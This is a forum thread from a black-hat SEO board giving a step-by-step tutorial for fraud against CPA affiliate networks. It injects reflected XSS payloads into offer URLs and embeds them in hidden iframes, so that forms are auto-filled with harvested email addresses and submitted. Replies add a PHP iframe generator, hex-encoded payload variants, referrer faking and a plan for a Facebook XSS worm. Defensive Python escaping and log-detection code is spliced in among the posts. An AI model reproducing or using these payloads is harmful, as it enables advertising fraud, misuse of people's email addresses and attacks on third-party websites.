
[TUTORIAL] Auto-Fill and Submit CPA Forms

Discussion in 'Black Hat SEO Tools' started by artizhay, Feb 14, 2011.

  1. artizhay

    In this tutorial, we will cover how to automatically fill and submit a CPA form. I have to give credit for sparking the idea to http://www.blackhatworld.com/blackhat-seo/members/121533-digitalgangster.html in my http://www.blackhatworld.com/blackhat-seo/black-hat-seo-tools/276584-tutorial-integrate-cpa-frames-regular-form.html thread. I also give credit to http://www.blackhatworld.com/blackhat-seo/members/30824-f0rked.html for further auto-submit inspiration, starting with pre-populating CPA offers.

    We will navigate through the tutorial using the scientific method because I am extremely bored.

    Question
    Can we effectively integrate a javascript injection into a URL to be loaded into an iframe so that the form will automatically fill and submit?

    Background Research
    I already knew how to do a javascript injection directly from the address bar by erasing everything from the bar and typing code, such as:
    Code:
    javascript:alert("Injection.");
    which would cause the message "Injection" to pop up on the screen.

    However, I needed something that could be appended to a URL so that I could easily put it into an iframe on my site. I resourced Google and found http://ha.ckers.org/xss.html at ha.ckers.org. I used the first example to concoct my own injection.

    Hypothesis
    With the proper injection string, code can be appended to the end of a query string parameter, using techniques inspired by PHP injection, in order to close the hidden input field that holds the query string parameter and insert our own code to execute javascript.

    Materials
    You will need:
    • Large e-mail list
    • Website
    • CPA network membership
    • Knowledge of how to retrieve and update your e-mail list

    Procedure
    1. You will need to test your e-mail submit CPA offers to see if we can exploit them. Please note that you will need to use your offer's real URL rather than your CPA tracking link.

    To test for an exploit, add the following code to the end of the URL then load the page:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.");});</script>
    So your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=239"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.");});</script>
    Your offer's URL most likely has parameters in the URL that tell it who's accessing it and who to credit the lead to. It looks something like ?id=293&ad=2898 etc. You've seen them before. Usually, the CPA pages store these values in hidden input fields on the page, so those parameters would end up looking like:
    Code:
    <input type="hidden" name="id" value="293">
    <input type="hidden" name="ad" value="2898">
    As you can see, the parameters just get placed into the HTML. So if you add your javascript injection on to the last parameter, then you can directly manipulate the HTML.

    The last parameter in my example was &ad=2898. What if you edited it so you can manipulate the page? Changing it to &ad=2898"><img src="http://site.com/img.jpg adds an image to the page.

    Basically, what the site is doing is this:
    Code:
    <input type="hidden" name="ad" value="{your parameter}">
    So if you change it, it becomes this:
    Code:
    <input type="hidden" name="ad" value="2898"><img src="http://site.com/img.jpg">
    Everything from 2898 through img.jpg is our "parameter" (*wink*) that we passed. As you can see, we left out the closing "> tag in the URL parameter because the site is designed to add that automatically since it thinks it's going to be given a proper value such as 2898. So you can add images...or a javascript code.

    2. Now that that rambling is done, we can move on to the actual exploit. You need to find the name of the e-mail input field. If you know how to do this, then great. If not:

    Load up the offer's source code. (View>Source, Page>View Source, Tools>View Source, many many ways depending on the browser). Hit CTRL+F to search and search for "<form". This will find the form.

    Find the inputs (begin with "<input") and find one that obviously is an e-mail input. E-mail submit pages usually only have 1 or 2 inputs so it won't be hard to find. It will say "E-mail" next to it or the name attribute (name="") will say "email", "em", "appData[em]" or something like that.

    Once you find it, take note of what the name attribute is (<input type="text" name="myEmail"> -> name is myEmail).

    3. We need to edit our injection to make sure we can inject an e-mail into the form. If your first injection test worked, this will most likely work as well. So load up the offer again without any injection code, just the plain, original URL, and add the following to the end of the URL:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
    So your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
    You will need to replace "email" (the field name after document.forms[0].) with the input name you got in step 2.
    Load the page and now the input box should say "email@email.com".

    4. If step 3 worked, we can move on. If not, make sure you used the correct input name and kept the proper syntax I provided. If you're sure you did it right and it still doesn't work, then move on to a new offer.

    All we need to do now is add one bit of code to submit the offer. So, again with the original URL of the offer, add the following:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
    So again, your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
    Load the URL and your form should fill with "email@email.com" then submit automatically.

    5. If step 4 worked, all you need to do is include that URL in an iframe. You must use single quotes to enclose the iframe attributes since our URL uses double-quotes and you must keep those double quotes.

    So:
    Code:
    <iframe src='http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>
    You may want to blank your referrer with referer.us. So you would just insert "http://referer.us/" before the URL. Your injection will still work.

    Conclusion
    You can use this on virtually any web page to turn every visitor into a lead as long as you have a lot of valid e-mails. You will need a way to access your e-mail database and mark them as "used" once you use it to submit your offer. I don't teach that here but the way I do it is with a MySQL database.

    I have a table called "mass_mail" with one field called "email" and one called "used". I select the first e-mail where "used" equals "no", use it for the offer, then update "used" to say "yes".

    You could also use a PHP array:
    PHP:
    $emails = array(
        array(
            "email" => "email_address",
            "used" => "no"
        ),
        array(
            "email" => "email_address",
            "used" => "no"
        )
    );
    and then search it for the first unused e-mail.
    Or store them in a text file.
     
    Last edited: Feb 14, 2011
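    As an added example (not code from the thread), the attribute breakout from step 1 modelled in Python: the unescaped rendering the tutorial relies on beside an escaped rendering that defeats it. The URL is constructed from the thread's own placeholder values.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


def render_hidden_unsafe(name, value):
    """The pattern the tutorial exploits: the query value is dropped into the
    attribute verbatim, so a value containing "> closes the tag early."""
    return '<input type="hidden" name="%s" value="%s">' % (name, value)


def render_hidden_safe(name, value):
    """Same markup with attribute escaping (the PHP equivalent is
    htmlspecialchars with ENT_QUOTES): a double quote becomes &quot;, so the
    attribute cannot be closed and no new tag is created."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag with its (already unescaped) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render_page(url, renderer):
    """Echo each query parameter back as a hidden input, the way the offer
    pages described in the thread do, using the given renderer."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return "".join(renderer(k, v[0]) for k, v in params.items())


def parsed_tags(markup):
    """Parse markup the way a browser would and return the tags it produces."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


# Constructed test URL carrying the image breakout shown in step 1.
INJECTED_URL = ('http://offerplace.com/index.php?id=388'
                '&ad=2898"><img src="http://site.com/img.jpg')
```

    With the unsafe renderer the parsed page contains a third tag (the img); with the escaped renderer the injected text survives only as the hidden field's value.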
  2. RobBanks

    Thanks for putting your time into your recent threads and explaining everything so clearly. You're the shit! I was wondering what resources you refer to when getting into this kind of HTML and code? I understand the concept of this and know some HTML, but for the little things when you get stuck, where would you go to learn this stuff? I can never seem to find good info relating to iframing except for on BHW! Great posts man, thanks again.
     
  3. SuperBlackHat

    I think I'ma give this a shot.
     
  4. f0rked

    A much less eloquent solution than using a database or array would be to simply pull the emails from a file, store the first line as the email to be used, then remove the line.

    PHP:
    <?php
    function getEmail(){
        $file = "emails.txt";
        // One e-mail per line.
        $emails = file($file);
        // Take the first line as the e-mail to use...
        $email = array_shift($emails);
        // ...and move it to the end of the list before writing the file back.
        $emails[] = $email;
        file_put_contents($file, $emails);
        $email = trim($email);
        echo "<iframe src='http://offerplace.com/index.php?id=388&ad=2398\"><script%20src=\"http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js\"%20type=\"text/javascript\"></script><script%20type=\"text/javascript\">$(document).ready(function()%20{document.forms[0].email.value=\"$email\";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>";
    }
    getEmail();
    ?>
    Crude example, but it works. Emails would be pulled from emails.txt, one email per line.
     
  5. facebookdude

    Thanks for the nice share!
     
  6. simplyblue

    Quality content and a much appreciated tutorial.
     
  7. cookiemonste

    nice tutorial!
     
  8. artizhay

    I'm compiling a list of networks with exploitable offers. It's modest, but PM me if you want it.

    To quickly test an offer for exploitation, append each of the following to the end of the URL until one works:

    1. Default type - directly append the code (should display "Test." on the screen):
    Code:
    "><script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">function doSubmitNow() {alert("Test.");} $(document).ready(function() {setTimeout("doSubmitNow()", 3000);});</script>
    2. Replace all spaces with %20
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">function%20doSubmitNow()%20{alert("Test.");}%20$(document).ready(function()%20{setTimeout("doSubmitNow()",%203000);});</script>
    3. Encode into hex values with http://ha.ckers.org/xss.html#XSScalc
    Code:
    %22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%6A%61%78%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%61%6A%61%78%2F%6A%71%75%65%72%79%2F%6A%71%75%65%72%79%2D%31%2E%34%2E%32%2E%6D%69%6E%2E%6A%73%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%6F%53%75%62%6D%69%74%4E%6F%77%28%29%20%7B%61%6C%65%72%74%28%22%54%65%73%74%2E%22%29%3B%7D%20%24%28%64%6F%63%75%6D%65%6E%74%29%2E%72%65%61%64%79%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%53%75%62%6D%69%74%4E%6F%77%28%29%22%2C%20%33%30%30%30%29%3B%7D%29%3B%3C%2F%73%63%72%69%70%74%3E
     
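    On the detection side, as an added example that is not from the thread: a small access-log checker that URL-decodes the request target and flags the attribute-closing "><script pattern, so the raw, %20-spaced and fully percent-hex variants listed above all normalise to the same text. The log lines and the x.js script name are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# A quote that closes the attribute, the > that closes the tag, then <script.
BREAKOUT_RE = re.compile(r"['\"]\s*>\s*<\s*script\b", re.IGNORECASE)


def decode_query(raw_target):
    """Return the fully URL-decoded query string of a request target.
    Decoding repeats until stable so double-encoded payloads normalise too."""
    prev, cur = None, urlsplit(raw_target).query
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur


def is_breakout(raw_target):
    """True when the decoded query carries the breakout-plus-script pattern."""
    return BREAKOUT_RE.search(decode_query(raw_target)) is not None


# Constructed combined-format lines. The request target is logged as sent,
# so each encoding variant appears exactly as it travelled on the wire.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Feb/2011:10:00:01 +0000] "GET /index.php?id=388&ad=2398 HTTP/1.1" 200 512',
    '203.0.113.6 - - [14/Feb/2011:10:00:02 +0000] "GET /index.php?id=388&ad=2398%22%3E%3Cscript%20src=%22x.js%22%3E%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Feb/2011:10:00:03 +0000] "GET /index.php?id=388&ad=2398%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22x.js%22%3E HTTP/1.1" 200 512',
    '203.0.113.8 - - [14/Feb/2011:10:00:04 +0000] "GET /index.php?id=388&ad=%22%3Eplain%20text HTTP/1.1" 200 512',
]
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_lines(lines):
    """Return (client_ip, decoded_query) for every request carrying the pattern."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m and is_breakout(m.group(1)):
            hits.append((line.split(" ", 1)[0], decode_query(m.group(1))))
    return hits
```

    A plain quote-and-bracket in a parameter (the last sample line) is not flagged on its own; only the script-tag follow-up is.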
  9. ch8878

    When doing this, won't your "Click Rate" be too high?
     
  10. fun4uoc

    Throw some cheap traffic at the offers.
     
  11. ch8878

    Can you PM me somewhere to get cheap traffic to use? Also, are you using landing pages or blogs or mini sites?
     
  12. fun4uoc

    I'm not doing this, as fraud hurts everyone in the long run.

    There are plenty of companies out there.

    http://lmgtfy.com/?q="cheap+traffic"
     
    Last edited: Feb 15, 2011
  13. ch8878

    Oh, OK, so you don't know if this works or not. I'm guessing not.
     
  14. f0rked

    It's not complicated at all. Everything has been broken down quite well by the OP, and what he didn't include, I included in my above post. The hardest part of all of this is finding the offers that it will work with. The OP has even offered to give you a list of the networks that have offers this works with. That narrows down the search even further as to which offers this works with. If you find it too difficult to get this set up, this method is not for you. Even if someone implemented it for you, you'd never see a cent of your earnings as you'd get banned from the network with the quickness.
     
  15. fun4uoc

    lol...

    Why the hell wouldn't it work?

    This is a common practice to lower your epc.
     
  16. blade_

    I think that the injection will still work with GhostCPA's fake referral. Can anyone confirm this for me?
     
    Last edited: Feb 15, 2011
  17. artizhay

    How does GhostCPA transform the URL? Since the point of blanking/faking is to modify the header information while still getting you to the same exact location that you originally requested, I don't see any reason why any faking/blanking would cause the injection to fail.
     
  18. DigitalGangster

    I have to say this method is very risky. The whole reason I started getting into this is that my ultimate goal was to get enough money from CPA on Facebook to find the XSS experts to find me XSS exploits in big websites like Facebook, YouTube, Twitter, etc.

    My ultimate goal was to pretty much code a polymorphic XSS worm, well, pay someone to do it, so I could spread the worm through any of those big websites.

    Imagine this: unleashing a polymorphic XSS worm on Facebook. That would mean that every time someone views the infected profile they would get infected, and you can totally modify the DOM. That means you can make them like a fan page, post a status update, send a message, pretty much any Facebook action without them knowing, and at the same time they get infected.

    I see money in that, because that's where true viral is at, if you can get the whole picture.
     
  19. blade_

    Thanks for the info about faking the referral ;) and the other info you provide ;)
     
  20. cristianraiber

    How about setting up a page - a freebie page with a form that collects that info:

    1. email
    2. name

    whatever else you need for the CPA offer, and use the above-mentioned method to pass that info to the CPA offer whilst also faking the referral? :)